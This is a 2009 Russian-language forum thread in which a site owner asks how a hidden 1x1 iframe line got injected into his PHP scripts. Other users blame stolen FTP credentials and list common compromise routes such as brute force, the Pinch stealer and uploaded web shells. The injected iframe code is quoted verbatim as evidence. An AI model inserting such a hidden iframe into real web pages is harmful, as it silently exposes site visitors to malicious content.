кто-то правил php скрипт
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
кто-то правил php скрипт - 2009-01-29 17:49:35.316666
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
Недавно с удивлением узнал что, на один из моих сайтов кричат антивирусы.
Сначала подумал что совсем охренели их сигнатуры, но от нечего делать пошарился в скриптах, вот что увидел -
echo "<iframe src=\"http://***.com/?click=554218\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
подскажите люди добрые, каким образом был осуществлён данный манёвр. Есть подозрения на уязвимость в include, хотя всё что через неё подключено - прописано в самом скрипте, статически…
есть подозрение на то что кто-то стянул пароли от фтп, но врятли, так как "опасная" функция добавлена везде одинаково, с одним отступом. Очень похоже на работу скрипта, но каким образом он работает прошу подсказать знающих форумчан.
|
|
|
|
|
RE: кто-то правил php скрипт - 2009-01-29 18:01:59.586666
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
Тоже была такая херня, пароли от ФТП ушли, тварюги проайфреймили. Адрес был, точно не помню, что-то типа www.xxxxx.cn\ho.php
quote:
"опасная" функция добавлена везде одинаково, с одним отступом
Это ийфреймер работает, поэтому и одинаково
Во я тогда охренел, когда мозиллой зашел на сайт, а он говорит "Этот сайт заражает компьютеры". А потом еще и хостер их вырубил.
|
|
|
|
|
RE: кто-то правил php скрипт - 2009-01-29 18:06:36.126666
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
ага, значит всё же фтп… видимо старый админ непрост оказался)…
quote:
Это ийфреймер работает, поэтому и одинаково
в смысле в скриптах. в двух скриптах проифреймили и везде с пропуском строки. такое ощущение, чтобы только заметнее было
|
|
|
|
|
RE: кто-то правил php скрипт - 2009-01-29 18:13:00.990000
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
У меня был index.php проайфреймен, и в папке где инклуды лежат несколько файлов, но не все. Они там как-то странно выбирались, не все подряд, а некоторые, по непонятной системе.
А айфреймы уже не помню где стояли, давно это было, еще летом. Я вот и подумал, как-нибудь сделать чтоб когда на ФТП логинятся в асю и\или смс приходил месс.
|
|
|
|
|
RE: кто-то правил php скрипт - 2009-01-29 19:04:23.613333
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
ага, кстати. тоже об этом щас думаю. правда я хотел прова попросить что-то сделать, всё же они там rules
|
|
|
|
|
RE: кто-то правил php скрипт - 2009-01-30 10:26:58.370000
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
quote:
ORIGINAL: brtn
подскажите люди добрые, каким образом был осуществлён данный манёвр.
Подсказать как ломаются фтп? [ul]брутфорс;наличие прав на запись;бажный соседний хост на этом же сервере;[/ul]
|
|
|
|
|
RE: кто-то правил php скрипт - 2009-01-30 11:01:17.610000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Да тот же пинч тырит логины и пассы от фтп с тотал коммандера.
зы: только это не обязательно фтп, может быть и другое:
порутаный хостер
тупо залитый шелл
+ то что Адр написал.
|
|
|
|
|
|
